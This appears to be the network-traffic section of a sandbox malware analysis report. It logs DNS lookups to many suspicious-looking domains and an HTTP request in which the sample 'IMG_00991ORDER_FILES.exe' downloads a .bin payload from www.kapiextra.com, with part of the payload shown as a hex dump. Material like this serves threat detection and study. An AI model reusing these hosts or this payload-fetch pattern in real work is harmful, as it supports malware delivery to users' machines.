Aug 27, 2024 17:51:20.710597038 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.780950069 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.807699919 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.807809114 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.807820082 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.807827950 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.807861090 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.807951927 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808011055 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.808024883 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808034897 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808152914 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.808193922 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808203936 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808264971 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808274031 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808283091 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808321953 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:20.808418036 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808579922 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808592081 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808599949 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808609009 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808617115 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808763981 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.808773041 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.906505108 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.906517029 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.906538963 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.906702995 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.906861067 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.906893015 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.906903028 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.906912088 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.907031059 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.907041073 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.980765104 CEST	80	49874	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:20.980918884 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:22.126967907 CEST	49874	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:23.144576073 CEST	49875	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:23.242312908 CEST	80	49875	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:23.242456913 CEST	49875	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:23.247764111 CEST	49875	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:23.345460892 CEST	80	49875	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:23.416874886 CEST	80	49875	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:23.417133093 CEST	80	49875	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:23.417319059 CEST	49875	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:23.419152021 CEST	49875	80	192.168.11.20	35.244.245.121
Aug 27, 2024 17:51:23.516880035 CEST	80	49875	35.244.245.121	192.168.11.20
Aug 27, 2024 17:51:28.424738884 CEST	49876	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:28.646039963 CEST	80	49876	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:28.646302938 CEST	49876	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:28.654114008 CEST	49876	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:28.877273083 CEST	80	49876	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:28.877507925 CEST	49876	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:30.156486988 CEST	49876	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:31.174395084 CEST	49877	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:31.396022081 CEST	80	49877	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:31.396178007 CEST	49877	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:31.404109001 CEST	49877	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:31.627439976 CEST	80	49877	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:31.627646923 CEST	49877	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:32.905865908 CEST	49877	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:33.923530102 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.145247936 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.145482063 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.154535055 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.154570103 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.154643059 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.376339912 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.376450062 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.376461983 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.376523018 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.376602888 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.376667976 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.376686096 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.376808882 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.376879930 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.376976013 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.377126932 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.377317905 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.598155975 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.598252058 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.598386049 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.598402023 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.598469973 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.598536968 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.598741055 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.598814011 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.598891020 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.599076033 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.599149942 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:34.599463940 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.599531889 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.599704027 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.599925041 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.600032091 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.820056915 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.820115089 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.820125103 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.820292950 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.820522070 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.820657015 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.820774078 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.820920944 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.822670937 CEST	80	49878	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:34.822834015 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:35.670850992 CEST	49878	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:36.688932896 CEST	49879	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:36.910762072 CEST	80	49879	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:36.911088943 CEST	49879	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:36.916383982 CEST	49879	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:37.140204906 CEST	80	49879	85.159.66.93	192.168.11.20
Aug 27, 2024 17:51:37.140533924 CEST	49879	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:37.142570019 CEST	49879	80	192.168.11.20	85.159.66.93
Aug 27, 2024 17:51:37.365986109 CEST	80	49879	85.159.66.93	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 27, 2024 17:45:51.777331114 CEST	58202	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:45:52.039859056 CEST	53	58202	1.1.1.1	192.168.11.20
Aug 27, 2024 17:46:24.873090029 CEST	57522	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:46:25.003926039 CEST	53	57522	1.1.1.1	192.168.11.20
Aug 27, 2024 17:46:30.023849964 CEST	64665	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:46:30.145087957 CEST	53	64665	1.1.1.1	192.168.11.20
Aug 27, 2024 17:46:50.814579010 CEST	55447	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:46:51.003585100 CEST	53	55447	1.1.1.1	192.168.11.20
Aug 27, 2024 17:47:04.139748096 CEST	63572	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:47:04.327847004 CEST	53	63572	1.1.1.1	192.168.11.20
Aug 27, 2024 17:47:17.980643988 CEST	61158	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:47:18.353394032 CEST	53	61158	1.1.1.1	192.168.11.20
Aug 27, 2024 17:47:32.539767981 CEST	61019	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:47:32.644426107 CEST	53	61019	1.1.1.1	192.168.11.20
Aug 27, 2024 17:47:40.694173098 CEST	62139	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:47:41.170564890 CEST	53	62139	1.1.1.1	192.168.11.20
Aug 27, 2024 17:47:54.925298929 CEST	61226	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:47:55.699464083 CEST	53	61226	1.1.1.1	192.168.11.20
Aug 27, 2024 17:48:08.906502962 CEST	61127	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:48:09.445700884 CEST	53	61127	1.1.1.1	192.168.11.20
Aug 27, 2024 17:48:23.200782061 CEST	55628	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:48:23.311579943 CEST	53	55628	1.1.1.1	192.168.11.20
Aug 27, 2024 17:48:31.370712042 CEST	55027	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:48:31.488964081 CEST	53	55027	1.1.1.1	192.168.11.20
Aug 27, 2024 17:48:44.633192062 CEST	51117	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:48:44.861443996 CEST	53	51117	1.1.1.1	192.168.11.20
Aug 27, 2024 17:48:59.145433903 CEST	59507	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:49:00.158369064 CEST	59507	53	192.168.11.20	9.9.9.9
Aug 27, 2024 17:49:00.360462904 CEST	53	59507	1.1.1.1	192.168.11.20
Aug 27, 2024 17:49:02.086211920 CEST	53	59507	9.9.9.9	192.168.11.20
Aug 27, 2024 17:49:14.220205069 CEST	53812	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:49:14.326690912 CEST	53	53812	1.1.1.1	192.168.11.20
Aug 27, 2024 17:49:22.390321016 CEST	55330	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:49:22.507564068 CEST	53	55330	1.1.1.1	192.168.11.20
Aug 27, 2024 17:49:35.637736082 CEST	51099	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:49:35.747150898 CEST	53	51099	1.1.1.1	192.168.11.20
Aug 27, 2024 17:49:51.961005926 CEST	54449	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:49:52.083937883 CEST	53	54449	1.1.1.1	192.168.11.20
Aug 27, 2024 17:50:52.277272940 CEST	63847	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:50:52.416961908 CEST	53	63847	1.1.1.1	192.168.11.20
Aug 27, 2024 17:51:42.154908895 CEST	60401	53	192.168.11.20	1.1.1.1
Aug 27, 2024 17:51:42.263725042 CEST	53	60401	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 27, 2024 17:45:51.777331114 CEST	192.168.11.20	1.1.1.1	0x636b	Standard query (0)	www.kapiextra.com	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:46:24.873090029 CEST	192.168.11.20	1.1.1.1	0x9b1b	Standard query (0)	www.ayna-pro.shop	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:46:30.023849964 CEST	192.168.11.20	1.1.1.1	0x1f91	Standard query (0)	www.23ddv.top	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:46:50.814579010 CEST	192.168.11.20	1.1.1.1	0x7f74	Standard query (0)	www.gyver.cloud	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:04.139748096 CEST	192.168.11.20	1.1.1.1	0x583e	Standard query (0)	www.vlyra.online	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:17.980643988 CEST	192.168.11.20	1.1.1.1	0xa4fe	Standard query (0)	www.tyai36.top	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:32.539767981 CEST	192.168.11.20	1.1.1.1	0xd04	Standard query (0)	www.950021.com	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:40.694173098 CEST	192.168.11.20	1.1.1.1	0x2e83	Standard query (0)	www.indeks.space	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:54.925298929 CEST	192.168.11.20	1.1.1.1	0x7144	Standard query (0)	www.kiristyle.shop	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:08.906502962 CEST	192.168.11.20	1.1.1.1	0x21	Standard query (0)	www.tmglift.xyz	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:23.200782061 CEST	192.168.11.20	1.1.1.1	0x7eb6	Standard query (0)	www.esistiliya.online	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:31.370712042 CEST	192.168.11.20	1.1.1.1	0x6e24	Standard query (0)	www.theaji.shop	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:44.633192062 CEST	192.168.11.20	1.1.1.1	0xb1e9	Standard query (0)	www.bola88site.one	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:59.145433903 CEST	192.168.11.20	1.1.1.1	0x49bb	Standard query (0)	www.policydetails.online	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:00.158369064 CEST	192.168.11.20	9.9.9.9	0x49bb	Standard query (0)	www.policydetails.online	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:14.220205069 CEST	192.168.11.20	1.1.1.1	0xe2fa	Standard query (0)	www.terrearcenciel.online	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:22.390321016 CEST	192.168.11.20	1.1.1.1	0xc418	Standard query (0)	www.at8l4.shop	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:35.637736082 CEST	192.168.11.20	1.1.1.1	0xd608	Standard query (0)	www.dom-2.online	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:51.961005926 CEST	192.168.11.20	1.1.1.1	0xc13c	Standard query (0)	www.ayna-pro.shop	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:50:52.277272940 CEST	192.168.11.20	1.1.1.1	0x84bd	Standard query (0)	www.950021.com	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:51:42.154908895 CEST	192.168.11.20	1.1.1.1	0x844e	Standard query (0)	www.esistiliya.online	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 27, 2024 17:45:52.039859056 CEST	1.1.1.1	192.168.11.20	0x636b	No error (0)	www.kapiextra.com	kapiextra.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:45:52.039859056 CEST	1.1.1.1	192.168.11.20	0x636b	No error (0)	kapiextra.com		23.111.141.202	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:46:25.003926039 CEST	1.1.1.1	192.168.11.20	0x9b1b	Name error (3)	www.ayna-pro.shop	none	none	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:46:30.145087957 CEST	1.1.1.1	192.168.11.20	0x1f91	No error (0)	www.23ddv.top	23ddv.top		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:46:30.145087957 CEST	1.1.1.1	192.168.11.20	0x1f91	No error (0)	23ddv.top		154.23.184.218	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:46:51.003585100 CEST	1.1.1.1	192.168.11.20	0x7f74	No error (0)	www.gyver.cloud	gyver.cloud		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:46:51.003585100 CEST	1.1.1.1	192.168.11.20	0x7f74	No error (0)	gyver.cloud		76.223.67.189	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:46:51.003585100 CEST	1.1.1.1	192.168.11.20	0x7f74	No error (0)	gyver.cloud		13.248.213.45	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:04.327847004 CEST	1.1.1.1	192.168.11.20	0x583e	No error (0)	www.vlyra.online		203.161.42.73	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:18.353394032 CEST	1.1.1.1	192.168.11.20	0xa4fe	No error (0)	www.tyai36.top	tyai36.top		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:47:18.353394032 CEST	1.1.1.1	192.168.11.20	0xa4fe	No error (0)	tyai36.top		38.47.207.120	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:32.644426107 CEST	1.1.1.1	192.168.11.20	0xd04	Name error (3)	www.950021.com	none	none	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:41.170564890 CEST	1.1.1.1	192.168.11.20	0x2e83	No error (0)	www.indeks.space		194.58.112.174	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:47:55.699464083 CEST	1.1.1.1	192.168.11.20	0x7144	No error (0)	www.kiristyle.shop	shops.vipshopbuy.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:47:55.699464083 CEST	1.1.1.1	192.168.11.20	0x7144	No error (0)	shops.vipshopbuy.com		35.244.245.121	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:09.445700884 CEST	1.1.1.1	192.168.11.20	0x21	No error (0)	www.tmglift.xyz	redirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:48:09.445700884 CEST	1.1.1.1	192.168.11.20	0x21	No error (0)	redirect.natrocdn.com	natroredirect.natrocdn.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:48:09.445700884 CEST	1.1.1.1	192.168.11.20	0x21	No error (0)	natroredirect.natrocdn.com		85.159.66.93	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:23.311579943 CEST	1.1.1.1	192.168.11.20	0x7eb6	Name error (3)	www.esistiliya.online	none	none	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:31.488964081 CEST	1.1.1.1	192.168.11.20	0x6e24	No error (0)	www.theaji.shop		3.82.56.39	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:31.488964081 CEST	1.1.1.1	192.168.11.20	0x6e24	No error (0)	www.theaji.shop		18.204.16.85	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:48:44.861443996 CEST	1.1.1.1	192.168.11.20	0xb1e9	No error (0)	www.bola88site.one	bola88site.one		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:48:44.861443996 CEST	1.1.1.1	192.168.11.20	0xb1e9	No error (0)	bola88site.one		172.96.191.39	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:00.360462904 CEST	1.1.1.1	192.168.11.20	0x49bb	No error (0)	www.policydetails.online	policydetails.online		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:49:00.360462904 CEST	1.1.1.1	192.168.11.20	0x49bb	No error (0)	policydetails.online		148.135.49.178	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:02.086211920 CEST	9.9.9.9	192.168.11.20	0x49bb	No error (0)	www.policydetails.online	policydetails.online		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:49:02.086211920 CEST	9.9.9.9	192.168.11.20	0x49bb	No error (0)	policydetails.online		148.135.49.178	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:14.326690912 CEST	1.1.1.1	192.168.11.20	0xe2fa	Name error (3)	www.terrearcenciel.online	none	none	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:22.507564068 CEST	1.1.1.1	192.168.11.20	0xc418	No error (0)	www.at8l4.shop	at8l4.shop		CNAME (Canonical name)	IN (0x0001)	false
Aug 27, 2024 17:49:22.507564068 CEST	1.1.1.1	192.168.11.20	0xc418	No error (0)	at8l4.shop		3.33.130.190	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:22.507564068 CEST	1.1.1.1	192.168.11.20	0xc418	No error (0)	at8l4.shop		15.197.148.33	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:35.747150898 CEST	1.1.1.1	192.168.11.20	0xd608	No error (0)	www.dom-2.online		199.59.243.226	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:49:52.083937883 CEST	1.1.1.1	192.168.11.20	0xc13c	Name error (3)	www.ayna-pro.shop	none	none	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:50:52.416961908 CEST	1.1.1.1	192.168.11.20	0x84bd	Name error (3)	www.950021.com	none	none	A (IP address)	IN (0x0001)	false
Aug 27, 2024 17:51:42.263725042 CEST	1.1.1.1	192.168.11.20	0x844e	Name error (3)	www.esistiliya.online	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.kapiextra.com

www.23ddv.top

www.gyver.cloud

www.vlyra.online

www.tyai36.top

www.indeks.space

www.kiristyle.shop

www.tmglift.xyz

www.theaji.shop

www.bola88site.one

www.policydetails.online

www.at8l4.shop

www.dom-2.online

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49806	23.111.141.202	80	6688	C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe

Timestamp	Bytes transferred	Direction	Data
Aug 27, 2024 17:45:52.183060884 CEST	180	OUT	GET /wRdZDseACWW137.bin HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Host: www.kapiextra.com Cache-Control: no-cache
Aug 27, 2024 17:45:52.320461988 CEST	1289	IN	HTTP/1.1 200 OK Date: Tue, 27 Aug 2024 15:45:52 GMT Server: Apache Last-Modified: Tue, 27 Aug 2024 01:43:10 GMT Accept-Ranges: bytes Content-Length: 288832 Content-Type: application/octet-stream Data Raw: 08 70 4b 68 26 3e 8a de 8b e9 e6 78 e8 3b 7a 6c 85 fb 49 37 8d c6 a2 d2 dd 40 1e bc 66 b8 c8 1a 69 e7 06 24 b0 68 0e b4 79 40 a5 73 eb 3d 51 9c ce 0b 8f 68 fa f4 fc 25 8e e6 78 e6 03 e7 f0 82 7a 42 d3 42 e0 bb e9 64 e2 62 92 a2 ab 6b 0e c1 ce 72 5d 02 b5 a7 0b 09 be 37 e7 34 de 54 26 13 73 f3 9e 42 68 44 4e f3 6c ce 04 a1 59 f5 7d 83 a5 01 d9 34 8d 08 70 87 95 20 b4 ed 30 0f 6d dd e2 79 3c 92 6a 22 9a 16 e9 19 8f 42 3b 81 13 9a 09 89 d5 5c 94 c4 bb 34 a0 27 6a 70 1b 54 08 69 6c fb 68 07 77 ea dc 4b f8 a6 4f 53 71 5a 7b c0 79 34 34 6e 7e 9b cd 8c 71 81 4a b7 95 ff 44 93 52 f5 0e bb fd bf f3 d0 a6 0f 89 aa b2 78 8c 44 7a 9c 8c c4 84 4e 37 98 58 56 24 7e b1 d4 89 0c 91 9b c1 ed 0c d1 a6 39 58 7f 09 4b da 85 f7 51 92 6f 0c 80 ac 98 eb fa a0 10 4e 1b b3 38 ba 95 32 10 0a 6e ff 42 ea 2b 50 c4 47 45 c6 32 9d 16 0d 65 87 32 35 af 96 90 db 1c c3 9b a4 61 5b b1 b3 ee e4 30 4a 5a ce d7 a7 c7 55 36 f3 ef 8b ca c1 ca 12 3e f4 c4 ff 1d 2c ff eb 37 42 bb 8f 55 3d b2 57 54 5c 62 84 fd 11 1a c6 b5 b3 fb 33 61 02 95 [TRUNCATED] Data Ascii: pKh&>x;zlI7@fi$hy@s=Qh%xzBBdbkr]74T&sBhDNlY}4p 0my<j"B;\4'jpTilhwKOSqZ{y44n~qJDRxDzN7XV$~9XKQoN82nB+PGE2e25a[0JZU6>,7BU=WT\b3a~KO^\hmEKvcw:CSNj@[xf[SMY@\|"(m-qs,cj082RK,GvlMuSK&t9_^3%Crto=v`jD~'N$'=fh7}bCXdyz>?t4pQ7`R<?G;WyGdW.}XaM,u5IQ0QnS+3i6P9Z,}M4@Pst$MpfWAvqXH;{R)k%@43o$L)]O4{`NI(0Y0k+zyhq6%h"2Zh'yP_g +n@7)CS&qm@.#O'-^OAvDpq8c?+W0k*_iyrX-P7K,:j3sM;Dst@,Sk_<57 xulgP/RsSp4]Q?K53kxm7)4%>HW [TRUNCATED]
Aug 27, 2024 17:45:52.320571899 CEST	1289	IN	Data Raw: bd 75 53 02 95 49 20 15 ea f0 80 93 58 8e 42 75 7d 1d 37 18 96 10 08 bb e9 64 e2 3a 11 4a a2 e0 c6 42 0e 4e d6 02 b6 66 88 c9 96 34 ef cb 3f c4 26 13 73 f3 9e 42 68 44 4e f3 6c ce 04 a1 59 f5 7d 83 a5 01 d9 34 8d 08 70 87 95 20 b4 ed 88 0f 6d dd Data Ascii: uSI XBu}7d:JBNf4?&sBhDNlY}4p mfjG`,FJJz:fbW%!s5([PPUJD+#oY`:$7.PkB=j0j#oUN9B+PGE&2d25a[
Aug 27, 2024 17:45:52.320702076 CEST	1289	IN	Data Raw: a7 b7 51 36 f3 ef cb ca c1 da 12 3e f4 c6 ff 1d 2a ff eb 37 42 bb 8f 55 3b b2 57 54 5c 62 84 fd 11 6a c2 b5 b3 f9 33 61 02 95 7e 0e c0 4b ba ce 5e 5c 8f 68 f5 7d 9a b2 02 e0 12 13 45 9d 4b f3 76 dc 8e 86 d3 05 f2 e1 fe 15 d2 ca b2 82 a8 05 63 8a Data Ascii: Q6>7BU;WT\bj3a~K^\h}EKvcw:CSNj@[xf[SMY@\|"(m-qs,cj*082RK,GvlMuSK&t9_^3%mIv`nD~qJ$'=fh7}BC8dyz
Aug 27, 2024 17:45:52.320717096 CEST	1289	IN	Data Raw: e6 8b c5 8b f1 f3 34 f3 0e 70 51 37 d8 60 52 3c 1c c1 ad f1 a6 ff d1 f4 95 3f 47 b2 d6 c8 db 3b 2a e5 57 79 47 b9 8e b5 64 57 94 bb 2e 7d 08 b0 1c 0e f2 b5 58 11 61 4d af 86 a5 ea 2c 75 35 49 51 a0 30 92 8d 94 51 a5 01 e2 6e 01 a2 fc 53 2b 33 0f Data Ascii: 4pQ7`R<?G;WyGdW.}XaM,u5IQ0QnS+3i6P9Z,}M4@Pst$MpfWAvqXH;{R)k%@43o$L)]O4{`NI(0Y0k+zyhq6%h"2Zh'yP
